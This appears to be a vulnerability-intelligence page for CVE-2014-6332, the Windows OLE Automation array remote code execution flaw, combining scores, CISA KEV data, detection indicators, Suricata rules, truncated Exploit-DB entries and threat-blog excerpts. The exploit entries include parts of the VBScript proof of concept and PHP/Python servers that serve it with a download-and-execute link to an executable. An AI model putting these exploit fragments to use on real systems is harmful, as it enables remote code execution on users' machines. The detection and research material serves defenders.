CVE-2014-6332
published 2014-11-11CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows…
PriorityP197high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
95.00%
99.9th percentile
OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0xDEADBEEF41414141
- →The CVE-2014-6332 SWF exploit shellcode bypasses EMET EAF by calling NtSetContextThread to override debug registers, eliminating EMET's EAF feature. Detect NtSetContextThread calls that modify debug registers from within browser/Flash processes. ↗
- →The exploit shellcode checks for the presence of EMET.dll in the process before choosing its WinExec invocation path. Monitor for EMET.dll presence checks from shellcode-like memory regions. ↗
- →The exploit drops a payload PE disguised as a JPEG ('shadow.jpg') marked with magic bytes 0xDEADBEEF41414141. Scan files with .jpg extension for this magic value as a detection signal. ↗
- →The exploit writes a payload to '%TEMP%\windump.exe' and executes it via WinExec. Alert on windump.exe creation in the user's Temp directory from browser or Office processes. ↗
- →The ROP chain is triggered by overriding a Sound object's vtable and calling toString. Detect vtable overwrites on Sound objects in Flash processes as an exploitation indicator. ↗
- →Pirpi malware uses HTTP GET requests with encrypted data in the Cookie header for C2 communication. Detect anomalous Cookie header content in GET requests to unknown domains from endpoints. ↗
- →The Lotus Blossom exploit payload is loaded via rundll32 with export 'Setting' from mm.dll in %LOCALAPPDATA%. Alert on rundll32 executing DLLs from AppData with the 'Setting' export argument. ↗
- →The exploit shellcode uses a ror-7 hash algorithm on kernel32.dll function names to resolve APIs; the constant 0xC917432 identifies LoadLibraryA. Use this constant in memory scanning or shellcode emulation rules. ↗
- →Pirpi checks for a configuration file at %APPDATA%\vcl.tmp or %TEMP%\vcl.tmp. Alert on creation or access of vcl.tmp in these locations as a Pirpi infection indicator. ↗
- ·The Pirpi payload (IePorxyv.dll) uses a configuration file (vcl.tmp) for C2 domains if present; otherwise it falls back to hardcoded C2 domains encoded inside the binary. Detection based solely on network IOCs may miss cases where vcl.tmp overrides hardcoded values. ↗
- ·The CVE-2014-6332 SWF exploit's EMET bypass is incomplete — it would still be caught by EMET's stack pivot check on VirtualAlloc, meaning EMET 4.1 with stack pivot protection enabled would block this specific sample. ↗
- ·The Lotus Blossom attack used a slightly modified version of the publicly available CVE-2014-6332 PoC VBScript; detections based on the exact PoC may miss actor-modified variants that remove comments and add payload extraction logic. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-w64p-pvrc-c5w3: OleAut32
ghsa_unreviewed·2022-05-14
CVE-2014-6332 [HIGH] CWE-119 GHSA-w64p-pvrc-c5w3: OleAut32
OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."
VulnCheck
Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability
vulncheck·2014·CVSS 8.8
CVE-2014-6332 [HIGH] CWE-119 Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability
Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability
OleAut32.dll in OLE in Microsoft Windows allows remote attackers to remotely execute code via a crafted web site.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rig-exploit-kit-diving-deeper-into-the-infrastructure/; https://wikileaks.org/vault7/document/2015-08-20150814-256-CSIR-15005-Stalker-Panda/2015-08-20150814-256-CSIR-15005-Stalker-Panda.pdf; https://www.stormshield.com/news/when-elf-billgates-met-windows/; https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/; https://comm
CISA
Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability
cisa·2022-03-25·CVSS 8.8
CVE-2014-6332 [HIGH] CWE-119 Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability
Vulnerability: Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability
Affected: Microsoft Windows
OleAut32.dll in OLE in Microsoft Windows allows remote attackers to remotely execute code via a crafted web site.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-6332
Remediation Due Date: 2022-04-15
Suricata
ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M2
suricata·2016-09-01·CVSS 8.8
CVE-2014-6332 [HIGH] ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M2
ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M2"; flow:established,to_client; http.server; content:"HFS|20|"; file.data; content:"|6f 62 6a 57 73 68 2e 72 75 6e 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 70 75 74 74 79 2e 65 78 65 22|"; nocase; reference:cve,2014-6332; classtype:trojan-activity; sid:2023146; rev:5; metadata:affected_product Internet_Explorer, attack_target Client_Endpoint, created_at 2016_09_01, cve CVE_2014_6332, deployment Perimeter, malware_family IEiExploit, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1
suricata·2016-09-01·CVSS 8.8
CVE-2014-6332 [HIGH] ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1
ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1"; flow:established,to_client; file.data; content:"|26 63 68 72 77 28 32 31 37 36 29 26 63 68 72 77 28 30 31 29 26|"; nocase; content:"|26 63 68 72 77 28 33 32 37 36 37 29|"; nocase; content:"|73 65 74 6e 6f 74 73 61 66 65 6d 6f 64 65 28 29|"; nocase; content:"|72 75 6e 73 68 65 6c 6c 63 6f 64 65 28 29|"; nocase; reference:cve,2014-6332; classtype:trojan-activity; sid:2023145; rev:3; metadata:affected_product Internet_Explorer, attack_target Client_Endpoint, created_at 2016_09_01, cve CVE_2014_6332, deployment Perimeter, malware_family IEiExploit, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, upd
Suricata
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2
suricata·2016-05-06·CVSS 8.8
CVE-2014-6332 [HIGH] ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2"; flow:established,to_client; file.data; content:"redim"; nocase; fast_pattern; content:"Preserve"; nocase; content:"VBScript"; nocase; content:"chrw"; content:"32767"; distance:0; content:"chrw"; content:"2176"; distance:0; classtype:attempted-admin; sid:2022797; rev:4; metadata:created_at 2016_05_06, cve CVE_2014_6332, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_14, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_i
Suricata
ET EXPLOIT Possible CVE-2014-6332 DECS2
suricata·2015-02-18·CVSS 8.8
CVE-2014-6332 [HIGH] ET EXPLOIT Possible CVE-2014-6332 DECS2
ET EXPLOIT Possible CVE-2014-6332 DECS2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2014-6332 DECS2"; flow:established,to_client; file.data; content:"102,117,110,99,116,105,111,110,32,114,117,110,109,117,109,97,97"; classtype:trojan-activity; sid:2020460; rev:5; metadata:created_at 2015_02_18, cve CVE_2014_6332, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_14;)
Suricata
ET WEB_CLIENT Possible Internet Explorer VBscript CVE-2014-6332 multiple redim preserve
suricata·2014-12-03·CVSS 8.8
CVE-2014-6332 [HIGH] ET WEB_CLIENT Possible Internet Explorer VBscript CVE-2014-6332 multiple redim preserve
ET WEB_CLIENT Possible Internet Explorer VBscript CVE-2014-6332 multiple redim preserve
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Possible Internet Explorer VBscript CVE-2014-6332 multiple redim preserve"; flow:established,to_client; http.content_type; content:!"text/xml"; content:!"application/xml"; file.data; content:"preserve"; nocase; content:"redim|20|"; nocase; fast_pattern; pcre:"/^\s*?Preserve\s*?(?P[a-z]\w{0,254}+)\s*?\x28\s*?[^\x29]+?\x29.*?redim\s*?Preserve\s*?(?P=var1)/Rsi"; reference:cve,2014-6332; classtype:attempted-user; sid:2019842; rev:7; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2014_12_03, cve CVE_2014_6332, deployment Perimeter, confidence Medium, signature_seve
Suricata
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name
suricata·2014-11-18·CVSS 8.8
CVE-2014-6332 [HIGH] ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name"; flow:established,to_client; file.data; content:"function"; pcre:"/^(?:\x25(?:25)*?20|\s)*?runmumaa\W/Rs"; content:"runmumaa"; fast_pattern; reference:cve,2014-6332; classtype:attempted-user; sid:2019733; rev:7; metadata:created_at 2014_11_18, cve CVE_2014_6332, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1082, m
Suricata
ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure obfuscated CVE-2014-6332
suricata·2014-11-15·CVSS 8.8
CVE-2014-6332 [HIGH] ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure obfuscated CVE-2014-6332
ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure obfuscated CVE-2014-6332
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure obfuscated CVE-2014-6332"; flow:established,to_client; file.data; content:"vbscript"; nocase; content:"Xor"; nocase; pcre:"/^\W/R"; content:"Execute"; nocase; content:"&chr"; nocase; content:"UBound"; fast_pattern; nocase; content:"Cint"; nocase; pcre:"/^\W/R"; content:"Split"; nocase; pcre:"/^\W/R"; content:"Mid"; pcre:"/^\W/R"; content:"Len"; pcre:"/^\W/R"; reference:cve,2014-6332; classtype:attempted-user; sid:2019715; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, a
Exploit-DB
The World Browser 3.0 Final - Remote Code Execution
exploitdb·2015-10-22
CVE-2014-6332 The World Browser 3.0 Final - Remote Code Execution
The World Browser 3.0 Final - Remote Code Execution
---
#!/usr/bin/php
Exploit-DB
HTML Compiler - Remote Code Execution
exploitdb·2015-10-20
CVE-2014-6332 HTML Compiler - Remote Code Execution
HTML Compiler - Remote Code Execution
---
#!/usr/bin/php
New Project -> Choose here your site index file
# 4 . browse loader.html
# 5 . Enjoy !
##########################################################
# loader.html source code :
#
# poc
##########################################################
# proof : http://ehsann.info/proof/HTML_Compiler_Remote_Code_Execute.png
##########################################################
$port=80; # Listen port ( if using from Skype or another program that using from 80 port change this )
$link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your Malicious file
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($socket, 0,$port);
socket_listen($socket);
print "http://ipaddress:$port / htt
Exploit-DB
Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)
exploitdb·2015-08-17
CVE-2014-6332 Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)
Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)
---
#!/usr/bin/php
poc'."\n\n";
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, 0,$port);
socket_listen($reza);
$msgd =
"\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76".
"\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65".
"\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68".
"\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20".
"\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63".
"\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\
Exploit-DB
Internet Download Manager - OLE Automation Array Remote Code Execution
exploitdb·2015-07-21
CVE-2014-6332 Internet Download Manager - OLE Automation Array Remote Code Execution
Internet Download Manager - OLE Automation Array Remote Code Execution
---
#!/usr/bin/php
Run Site Grabber
# 4 . Enter any word "Start page/address"
# 5 . Click Addvance
# 6 . check "Enter Login and password manually at the following web page"
# 7 . Enter your exploit link http://ipaddress:80/
# 8 . Next --> Next --> Next --> Next
# 9 . Your Link Download/Execute on your target
# 10 . Finished ;)
#
#
#Demo : http://youtu.be/fAUAX7UjXLg
$port=80; # Port Address
$link="http://10.211.55.3/putty.exe"; # Your exe link
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, 0,$port);
socket_listen($reza);
print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n";
$msg =
"\x3c\x68\x74\x6d\x6
Exploit-DB
Havij - OLE Automation Array Remote Code Execution
exploitdb·2015-06-27
CVE-2014-6332 Havij - OLE Automation Array Remote Code Execution
Havij - OLE Automation Array Remote Code Execution
---
#!/usr/bin/php
Exploit-DB
Acunetix 9.5 - OLE Automation Array Remote Code Execution
exploitdb·2015-03-27
CVE-2014-6332 Acunetix 9.5 - OLE Automation Array Remote Code Execution
Acunetix 9.5 - OLE Automation Array Remote Code Execution
---
#!/usr/bin/python
import BaseHTTPServer, sys, socket
##
# Acunetix OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 27 Mar 2015 # Version: acunetix.exe
#
# Video: https://vid.me/SRCb
##
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(req):
req.send_response(200)
if req.path == "/acunetix.exe":
req.send_header('Content-type', 'application/exe')
req.end_headers()
exe = open("acunetix.exe", 'rb')
req.wfile.write(exe.read())
exe.close()
else:
req.send_header('Content-type', 'text/html')
req.end_headers()
req.wfile.write("""Please scan me!
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Ap
Exploit-DB
Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)
exploitdb·2014-11-20
CVE-2014-6332 Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)
Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)
---
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
| Rework: GradiusX ([email protected] ) & b33f (@FuzzySec) |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
| Usage: http://www.fuzzysecurity.com/exploits/21.html |
|--------------------------------------------------------------------------|
Very nice black-magic yuange, don't think it went unnoticed that you
have been popping shells since 2009 :D 人无千日好,花无百日红
|-----------------------------------------------------------
Exploit-DB
Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (Metasploit)
exploitdb·2014-11-13·CVSS 8.8
CVE-2014-6332 [HIGH] Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (Metasploit)
Microsoft Internet Explorer "Windows OLE Automation Array Remote Code Execution",
'Description' => %q{
This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.
Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'IBM', # Discovery
'yuange ', # PoC
'Rik van Duijn ', #Metasploit
'Wesley Neelen ' #Metasploit
],
'References' =>
[
[ 'CVE', '2014-6332' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "November 12 2014",
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
payl = cmd_psh
Exploit-DB
Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)
exploitdb·2014-11-13
CVE-2014-6332 Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)
Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)
---
//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
cve-2014-6332 exploit
https://twitter.com/yuange75
http://hi.baidu.com/yuange1975
*//
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
end function
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chr
Metasploit
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
metasploit·CVSS 8.8
CVE-2014-6332 [HIGH] MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332. The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box due to the Powershell limitation. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.
Sentinelone
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
blogs_sentinelone·2022-06-09
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
## Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
## Executive Summary
Aoqin Dragon, a threat actor SentinelLABS has been extensively tracking, has operated since 2013 targeting government, education, and telecommunication organizations in Southeast Asia and Australia.
Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices.
Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.
Based on our analysis of the targets, infrastructure and malware structure of Aoqin Dragon campaigns, we assess with moderate confidence the threat actor is a small Chinese-speaking team with potential ass
Sentinelone
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
blogs_sentinelone·2022-06-09
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
## Executive Summary
- Aoqin Dragon, a threat actor SentinelLABS has been extensively tracking, has operated since 2013 targeting government, education, and telecommunication organizations in Southeast Asia and Australia.
- Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices.
- Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.
- Based on our analysis of the targets, infrastructure and malware structure of Aoqin Dragon campaigns, we assess with moderate confidence the threat actor is a small Chinese-speaking team with potential association to UNC94 (Mandiant).
## Overview
SentinelLABS has uncovered a cluster of activity beginning a
Unit42
Web-Based Threats: First Half 2019
blogs_unit42·2019-11-01
Web-Based Threats: First Half 2019
Threat Research Center
Trend Reports
Malware
## Web-Based Threats: First Half 2019
Fang Liu
Tao Yan
Jin Chen
Rongbo Shao
Zhanglin He
Bo Qu
Published: November 1, 2019
Malware
Trend Reports
Vulnerabilities
ELink
Exploit Kits
Malicious Domains
Malicious URL
Phishing
## Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system . In examining the data we collect, which includes URLs extracted from emails or submitted by API, we can identify patterns and trends which helps us discern prevalent web threats. This blog is the fifth installment in a series of posts tracking web-based threats over time, specifically, statistics pertaining to malicious URLs, domains, exploit kits, vulnerabilities, and phishing scams.
Unit42
Web-Based Threats: First Half 2019
blogs_unit42·2019-11-01
Web-Based Threats: First Half 2019
# Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data we collect, which includes URLs extracted from emails or submitted by API, we can identify patterns and trends which helps us discern prevalent web threats. This blog is the fifth installment in a series of posts tracking web-based threats over time, specifically, statistics pertaining to malicious URLs, domains, exploit kits, vulnerabilities, and phishing scams.
We observed a significant decrease in the activity of the Fallout exploit kit in the first quarter of 2019 while at the same time observing an increase in activity of the Kaixin exploit kit in the second quarter. Kaixin is primarily observed hosted in China and with the increased popularit
Trendmicro
‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell
blogs_trendmicro·2019-09-09
‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell
Cyber Threats
# ‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell
This new iteration of Purple Fox that we came across, delivered by Rig, has a few new tricks up its sleeve. It retains its rootkit component by abusing publicly available code. It also abuses PowerShell making it capable of fileless infection.
By: Johnlery Triunfante, Earle Maui Earnshaw, Michael Jhon Ofiaza
Sep 09, 2019
Read time: ( words)
Save to Folio
Exploit kits may no longer be as prolific as it was back when their activities were detected in the millions, but their recurring activities in the first half of 2019 indicate that they won’t be going away any time soon. The Rig exploit kit, for instance, is known for delivering various payloads — such as downloader trojans, ransomware, cryptocurrency-mining malwar
Trendmicro
‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell
blogs_trendmicro·2019-09-09
‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell
Cyber Threats
# ‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell
This new iteration of Purple Fox that we came across, delivered by Rig, has a few new tricks up its sleeve. It retains its rootkit component by abusing publicly available code. It also abuses PowerShell making it capable of fileless infection.
By: Johnlery Triunfante, Earle Maui Earnshaw, Michael Jhon Ofiaza
2019/09/09
Read time: ( words)
Save to Folio
Exploit kits may no longer be as prolific as it was back when their activities were detected in the millions, but their recurring activities in the first half of 2019 indicate that they won’t be going away any time soon. The Rig exploit kit, for instance, is known for delivering various payloads — such as downloader trojans, ransomware, cryptocurrency-mining malware,
Unit42
Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
blogs_unit42·2019-05-30·CVSS 8.8
[HIGH] Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data it collects, which are URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fourth (4th quarter of 2018) installment in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, CVEs, and now, phishing scams.
The key findings in this quarter’s report in summary are:
1. After Q4 saw an increase in malicious URLs, ending a trend of decreasing malicious URLs starting in Q1 and continuing through Q3.
2. For the first time in our tracking, the United States is not the number one
Unit42
Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
blogs_unit42·2019-05-30·CVSS 8.8
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Threat Research Center
Trend Reports
Malware
## Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: May 30, 2019
Malware
Trend Reports
Vulnerabilities
Azorult
CVE-2018-8174
ELink
Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system . In examining the data it collects, which are URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fourth (4th quarter of 2018) installment in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, CVEs, and now, ph
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
[CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
# Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which helps us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain data; there was a significant drop in the number of malicious URLs as well as a drop in malicious domains that will be discussed below. In addition, we will be covering an interesting malicious Flash SWF that exploits CVE-2015-5119.
# URLs
Based on our analysis of dat
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
CVE-2015-5119 [CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Threat Research Center
Trend Reports
Malware
## Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Xingyu Jin
Published: December 27, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2015-5119
ELink
## Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which helps us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain d
Trendmicro
New CVE-2018-8373 Exploit Spotted
blogs_trendmicro·2018-09-25·CVSS 8.8
CVE-2018-8373 [HIGH] New CVE-2018-8373 Exploit Spotted
Exploits y vulnerabilidades
## New CVE-2018-8373 Exploit Spotted
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability.
By: Elliot Cao Sep 25, 2018 Read time: ( words)
Save to Folio
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability CVE-2018-8373 that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability. It's important to note that this exploit doesn't work on systems with updated Internet Explorer versions.
Instead of modifying the CONTEXT structure of N
Trendmicro
New CVE-2018-8373 Exploit Spotted
blogs_trendmicro·2018-09-25·CVSS 8.8
CVE-2018-8373 [HIGH] New CVE-2018-8373 Exploit Spotted
Exploits & Vulnerabilities
## New CVE-2018-8373 Exploit Spotted
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability.
